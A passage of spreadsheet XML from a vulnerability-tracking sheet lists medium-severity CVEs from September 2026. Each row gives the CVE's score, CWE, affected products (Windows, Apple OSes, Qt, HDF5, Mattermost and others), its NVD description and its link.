      <c r="C1298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68849</t>
        </is>
      </c>
      <c r="D1298" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E1298" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1298" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1298" s="5" t="inlineStr"/>
      <c r="H1298" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1298" s="5" t="inlineStr"/>
      <c r="J1298" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1298" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1298" s="5" t="inlineStr"/>
      <c r="M1298" s="5" t="inlineStr"/>
      <c r="N1298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1298" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1298" s="5" t="inlineStr"/>
      <c r="Q1298" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1298" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Bluetooth Port Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S1298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68849</t>
        </is>
      </c>
    </row>
    <row r="1299">
      <c r="A1299" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1299" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69832</t>
        </is>
      </c>
      <c r="D1299" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E1299" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1299" s="5" t="inlineStr"/>
      <c r="H1299" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1299" s="5" t="inlineStr"/>
      <c r="J1299" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1299"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299" s="5" t="inlineStr"/>
      <c r="M1299" s="5" t="inlineStr"/>
      <c r="N1299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1299" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1299" s="5" t="inlineStr"/>
      <c r="Q1299" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="R1299" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S1299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69832</t>
        </is>
      </c>
    </row>
    <row r="1300">
      <c r="A1300" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1300" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69853</t>
        </is>
      </c>
      <c r="D1300" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E1300" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1300" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1300" s="5" t="inlineStr"/>
      <c r="H1300" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1300" s="5" t="inlineStr"/>
      <c r="J1300" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1300"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300" s="5" t="inlineStr"/>
      <c r="M1300" s="5" t="inlineStr"/>
      <c r="N1300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1300" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1300" s="5" t="inlineStr"/>
      <c r="Q1300" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="R1300" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S1300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69853</t>
        </is>
      </c>
    </row>
    <row r="1301">
      <c r="A1301" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1301" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69895</t>
        </is>
      </c>
      <c r="D1301" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E1301" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1301" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1301" s="5" t="inlineStr"/>
      <c r="H1301" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1301" s="5" t="inlineStr"/>
      <c r="J1301" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1301"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301" s="5" t="inlineStr"/>
      <c r="M1301" s="5" t="inlineStr"/>
      <c r="N1301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1301" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1301" s="5" t="inlineStr"/>
      <c r="Q1301" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1301" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S1301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69895</t>
        </is>
      </c>
    </row>
    <row r="1302">
      <c r="A1302" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1302" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75025</t>
        </is>
      </c>
      <c r="D1302" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E1302" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1302" s="5" t="inlineStr">
        <is>
          <t>responsibledisclosure@mattermost.com</t>
        </is>
      </c>
      <c r="G1302" s="5" t="inlineStr"/>
      <c r="H1302" s="5" t="inlineStr"/>
      <c r="I1302" s="5" t="inlineStr"/>
      <c r="J1302" s="5" t="inlineStr"/>
      <c r="K1302" s="5" t="inlineStr"/>
      <c r="L1302" s="5" t="inlineStr"/>
      <c r="M1302" s="5" t="inlineStr"/>
      <c r="N1302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1302" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1302" s="5" t="inlineStr"/>
      <c r="Q1302" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="R1302" s="5" t="inlineStr">
        <is>
          <t>Mattermost Desktop App versions &lt;=6.2 6.2.2.0 Fixed an issue where Mattermost Desktop did not sufficiently restrict server-rendered content from accessing local or private network resources. Thanks to game0v3r for contributing to this improvement under the Mattermost responsible disclosure policy. Mattermost Advisory ID: MMSA-2026-00698</t>
        </is>
      </c>
      <c r="S1302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75025</t>
        </is>
      </c>
    </row>
    <row r="1303">
      <c r="A1303" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1303" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80176</t>
        </is>
      </c>
      <c r="D1303" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E1303" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1303" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1303" s="5" t="inlineStr"/>
      <c r="H1303" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1303" s="5" t="inlineStr"/>
      <c r="J1303" s="5" t="inlineStr"/>
      <c r="K1303" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1303" s="5" t="inlineStr"/>
      <c r="M1303" s="5" t="inlineStr"/>
      <c r="N1303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1303" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P1303" s="5" t="inlineStr"/>
      <c r="Q1303" s="5" t="inlineStr">
        <is>
          <t>CWE-257</t>
        </is>
      </c>
      <c r="R1303" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Plaintext Storage of a Password vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to information disclosure.</t>
        </is>
      </c>
      <c r="S1303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80176</t>
        </is>
      </c>
    </row>
    <row r="1304">
      <c r="A1304" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1304" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84492</t>
        </is>
      </c>
      <c r="D1304" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E1304" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1304" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1304" s="5" t="inlineStr"/>
      <c r="H1304" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1304" s="5" t="inlineStr"/>
      <c r="J1304" s="5" t="inlineStr"/>
      <c r="K1304" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L1304" s="5" t="inlineStr"/>
      <c r="M1304" s="5" t="inlineStr"/>
      <c r="N1304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1304" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1304" s="5" t="inlineStr"/>
      <c r="Q1304" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R1304" s="5" t="inlineStr">
        <is>
          <t>A race condition was addressed with improved state handling. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. An app may be able to cause unexpected system termination.</t>
        </is>
      </c>
      <c r="S1304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84492</t>
        </is>
      </c>
    </row>
    <row r="1305">
      <c r="A1305" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1305" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84550</t>
        </is>
      </c>
      <c r="D1305" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E1305" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1305" s="5" t="inlineStr"/>
      <c r="H1305" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1305" s="5" t="inlineStr"/>
      <c r="J1305" s="5" t="inlineStr"/>
      <c r="K1305" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L1305" s="5" t="inlineStr"/>
      <c r="M1305" s="5" t="inlineStr"/>
      <c r="N1305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1305" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1305" s="5" t="inlineStr"/>
      <c r="Q1305" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R1305" s="5" t="inlineStr">
        <is>
          <t>A race condition was addressed with additional validation. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to cause unexpected system termination.</t>
        </is>
      </c>
      <c r="S1305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84550</t>
        </is>
      </c>
    </row>
    <row r="1306">
      <c r="A1306" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1306" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84630</t>
        </is>
      </c>
      <c r="D1306" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E1306" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1306" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1306" s="5" t="inlineStr"/>
      <c r="H1306" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1306" s="5" t="inlineStr"/>
      <c r="J1306" s="5" t="inlineStr"/>
      <c r="K1306" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L1306" s="5" t="inlineStr"/>
      <c r="M1306" s="5" t="inlineStr"/>
      <c r="N1306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1306" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1306" s="5" t="inlineStr"/>
      <c r="Q1306" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R1306" s="5" t="inlineStr">
        <is>
          <t>A race condition was addressed with improved state handling. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. An app may be able to cause unexpected system termination.</t>
        </is>
      </c>
      <c r="S1306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84630</t>
        </is>
      </c>
    </row>
    <row r="1307">
      <c r="A1307" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1307" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85732</t>
        </is>
      </c>
      <c r="D1307" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E1307" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1307" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1307" s="5" t="inlineStr"/>
      <c r="H1307" s="5" t="inlineStr"/>
      <c r="I1307" s="5" t="inlineStr"/>
      <c r="J1307" s="5" t="inlineStr"/>
      <c r="K1307" s="5" t="inlineStr"/>
      <c r="L1307" s="5" t="inlineStr"/>
      <c r="M1307" s="5" t="inlineStr"/>
      <c r="N1307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1307" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1307" s="5" t="inlineStr"/>
      <c r="Q1307" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1307" s="5" t="inlineStr">
        <is>
          <t>oras-go is</t>
        </is>
      </c>
      <c r="S1307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85732</t>
        </is>
      </c>
    </row>
    <row r="1308">
      <c r="A1308" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1308" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92221</t>
        </is>
      </c>
      <c r="D1308" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E1308" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1308" s="5" t="inlineStr"/>
      <c r="H1308" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1308" s="5" t="inlineStr"/>
      <c r="J1308" s="5" t="inlineStr"/>
      <c r="K1308" s="5" t="inlineStr"/>
      <c r="L1308" s="5" t="inlineStr"/>
      <c r="M1308" s="5" t="inlineStr"/>
      <c r="N1308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1308" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1308" s="5" t="inlineStr"/>
      <c r="Q1308" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R1308" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in gedelumbung HospitalManagement up to c2d45543789a3887067d3915f69d44cfc2cf76a8. Affected by this vulnerability is the function generate_index_pasien of the file application/models/app_global_admin_model.php. Executing a manipulation of the argument cari can lead to sql injection. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S1308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92221</t>
        </is>
      </c>
    </row>
    <row r="1309">
      <c r="A1309" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1309" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69548</t>
        </is>
      </c>
      <c r="D1309" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E1309" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1309" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1309" s="5" t="inlineStr"/>
      <c r="H1309" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1309" s="5" t="inlineStr"/>
      <c r="J1309" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1309"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309" s="5" t="inlineStr"/>
      <c r="M1309" s="5" t="inlineStr"/>
      <c r="N1309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1309" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1309" s="5" t="inlineStr"/>
      <c r="Q1309" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1309" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows RNDIS allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="S1309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69548</t>
        </is>
      </c>
    </row>
    <row r="1310">
      <c r="A1310" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1310" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76151</t>
        </is>
      </c>
      <c r="D1310" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E1310" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1310" s="5" t="inlineStr">
        <is>
          <t>a59d8014-47c4-4630-ab43-e1b13cbe58e3</t>
        </is>
      </c>
      <c r="G1310" s="5" t="inlineStr"/>
      <c r="H1310" s="5" t="inlineStr"/>
      <c r="I1310" s="5" t="inlineStr"/>
      <c r="J1310" s="5" t="inlineStr"/>
      <c r="K1310" s="5" t="inlineStr"/>
      <c r="L1310" s="5" t="inlineStr"/>
      <c r="M1310" s="5" t="inlineStr"/>
      <c r="N1310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1310" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1310" s="5" t="inlineStr"/>
      <c r="Q1310" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-197</t>
        </is>
      </c>
      <c r="R1310" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read (buffer over-read) in the HTTP Cache-Control response header parsing in the QtNetwork module in Qt Group Qt 6.0.0 through 6.8.8, and 6.9.0 through 6.11.1, allows remote attackers to cause a denial of service (application crash) via an excessively large Cache-Control header value returned by an untrusted or compromised HTTP server to an application using QNetworkAccessManager. Only the client side of the connection is affected and 32-bit builds are not affected; the out-of-bounds access is read-only, with no information disclosure and no code execution.</t>
        </is>
      </c>
      <c r="S1310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76151</t>
        </is>
      </c>
    </row>
    <row r="1311">
      <c r="A1311" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1311" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86890</t>
        </is>
      </c>
      <c r="D1311" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E1311" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1311" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1311" s="5" t="inlineStr"/>
      <c r="H1311" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1311" s="5" t="inlineStr"/>
      <c r="J1311" s="5" t="inlineStr"/>
      <c r="K1311" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os</t>
        </is>
      </c>
      <c r="L1311" s="5" t="inlineStr"/>
      <c r="M1311" s="5" t="inlineStr"/>
      <c r="N1311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1311" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1311" s="5" t="inlineStr"/>
      <c r="Q1311" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R1311" s="5" t="inlineStr">
        <is>
          <t>A logic issue was addressed with improved checks. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27. An attacker with physical access to a locked device may be able to view sensitive user information.</t>
        </is>
      </c>
      <c r="S1311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86890</t>
        </is>
      </c>
    </row>
    <row r="1312">
      <c r="A1312" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1312" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90955</t>
        </is>
      </c>
      <c r="D1312" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E1312" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1312" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G1312" s="5" t="inlineStr"/>
      <c r="H1312" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1312" s="5" t="inlineStr"/>
      <c r="J1312" s="5" t="inlineStr"/>
      <c r="K1312" s="5" t="inlineStr"/>
      <c r="L1312" s="5" t="inlineStr"/>
      <c r="M1312" s="5" t="inlineStr"/>
      <c r="N1312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1312" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1312" s="5" t="inlineStr"/>
      <c r="Q1312" s="5" t="inlineStr">
        <is>
          <t>CWE-223, CWE-778</t>
        </is>
      </c>
      <c r="R1312" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP’s interactive CLI shell do not reliably preserve the identity of the impersonated MISP user across audit logging.
The shell is designed to run actions as a supplied MISP user ID. However, the legacy SysLogLogable behavior stored that identity in behavior-instance state that could be overwritten when another model lazily attached the shared behavior. Consequently, subsequent CLI writes could lose the intended user attribution and be logged incorrectly. The commit also notes that CLI-originated records lacked a CLI marker, making them appear similar to ordinary web actions by that user.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="S1312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90955</t>
        </is>
      </c>
    </row>
    <row r="1313">
      <c r="A1313" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1313" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92627</t>
        </is>
      </c>
      <c r="D1313" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E1313" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1313" s="5" t="inlineStr">
        <is>
          <t>0253b833-3e77-4dfe-9d57-17db1a2f0a74</t>
        </is>
      </c>
      <c r="G1313" s="5" t="inlineStr"/>
      <c r="H1313" s="5" t="inlineStr"/>
      <c r="I1313" s="5" t="inlineStr"/>
      <c r="J1313" s="5" t="inlineStr"/>
      <c r="K1313" s="5" t="inlineStr"/>
      <c r="L1313" s="5" t="inlineStr"/>
      <c r="M1313" s="5" t="inlineStr"/>
      <c r="N1313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1313" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1313" s="5" t="inlineStr"/>
      <c r="Q1313" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1313" s="5" t="inlineStr">
        <is>
          <t>A heap-use-after-free vulnerability exists in H5T__conv_f_f() in src/H5Tconv.c in HDF5 before 1.14.2. When converting a compound datatype containing floating-point members during a dataset read, a temporary buffer allocated with calloc() is freed and subsequently read from within the same conversion routine. An attacker who can supply a crafted HDF5 file containing a specially constructed compound datatype can trigger the use-after-free when the file is parsed by an application that reads the affected dataset, such as h5dump. This can result in a crash and, depending on heap layout and allocator behavior, may be exploitable for further memory corruption up to remote code execution.</t>
        </is>
      </c>
      <c r="S1313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92627</t>
        </is>
      </c>
    </row>
    <row r="1314">
      <c r="A1314" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1314" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1314" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-36591</t>
        </is>
      </c>
      <c r="D1314" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E1314" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1314" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1314" s="5" t="inlineStr"/>
      <c r="H1314" s="5" t="inlineStr"/>
      <c r="I1314" s="5" t="inlineStr"/>
      <c r="J1314" s="5" t="inlineStr"/>
